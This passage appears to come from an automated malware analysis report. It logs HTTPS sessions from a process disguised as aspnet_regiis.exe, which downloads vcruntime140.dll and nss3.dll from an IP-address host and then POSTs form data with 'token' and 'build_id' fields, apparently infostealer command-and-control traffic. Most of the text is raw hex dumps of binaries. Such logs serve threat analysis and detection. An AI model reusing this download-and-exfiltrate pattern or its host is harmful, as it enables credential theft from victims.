                                                                                                                          2024-10-03 01:27:04 UTC16384INData Raw: 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00
                                                                                                                          Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
                                                                                                                          2024-10-03 01:27:04 UTC16384INData Raw: 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15
                                                                                                                          Data Ascii: @]]USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
                                                                                                                          2024-10-03 01:27:04 UTC16384INData Raw: e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25
                                                                                                                          Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          15192.168.2.75796149.12.197.94437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-03 01:27:05 UTC200OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2024-10-03 01:27:06 UTC261INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:27:06 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 80880
                                                                                                                          Connection: close
                                                                                                                          Last-Modified: Thursday, 03-Oct-2024 01:27:06 GMT
                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-03 01:27:06 UTC16123INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                                                          2024-10-03 01:27:06 UTC16384INData Raw: 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c
                                                                                                                          Data Ascii: +t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F
                                                                                                                          2024-10-03 01:27:06 UTC16384INData Raw: 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01
                                                                                                                          Data Ascii: uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMG
                                                                                                                          2024-10-03 01:27:06 UTC16384INData Raw: d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f
                                                                                                                          Data Ascii: ttt@++t+t+u+uQ<0|*<9&w/c5~bASJCtv
                                                                                                                          2024-10-03 01:27:06 UTC15605INData Raw: 54 cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f
                                                                                                                          Data Ascii: T@L|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicro


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          16192.168.2.75796249.12.197.94437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-03 01:27:07 UTC192OUTGET /nss3.dll HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2024-10-03 01:27:08 UTC263INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:27:07 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 2046288
                                                                                                                          Connection: close
                                                                                                                          Last-Modified: Thursday, 03-Oct-2024 01:27:07 GMT
                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-03 01:27:08 UTC16121INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                                                          2024-10-03 01:27:08 UTC16384INData Raw: 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a
                                                                                                                          Data Ascii: kd)i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MA
                                                                                                                          2024-10-03 01:27:08 UTC16384INData Raw: 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45
                                                                                                                          Data Ascii: RQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                                                          2024-10-03 01:27:08 UTC16384INData Raw: 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10
                                                                                                                          Data Ascii: @@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
                                                                                                                          2024-10-03 01:27:08 UTC16384INData Raw: ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd
                                                                                                                          Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
                                                                                                                          2024-10-03 01:27:08 UTC16384INData Raw: 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3
                                                                                                                          Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
                                                                                                                          2024-10-03 01:27:08 UTC16384INData Raw: 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b
                                                                                                                          Data Ascii: d8C0;^h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$
                                                                                                                          2024-10-03 01:27:08 UTC16384INData Raw: e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d
                                                                                                                          Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
                                                                                                                          2024-10-03 01:27:08 UTC16384INData Raw: 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff
                                                                                                                          Data Ascii: Y`P19F$WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
                                                                                                                          2024-10-03 01:27:08 UTC16384INData Raw: 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18
                                                                                                                          Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          17192.168.2.75796349.12.197.94437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-03 01:27:10 UTC277OUTPOST / HTTP/1.1
                                                                                                                          Content-Type: multipart/form-data; boundary=----JDBFIIEBGCAKKEBFBAAF
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Content-Length: 1145
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2024-10-03 01:27:10 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 36 65 33 37 37 32 34 35 61 32 62 33 36 66 66 65 64 66 32 66 37 65 66 37 33 32 63 30 34 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74
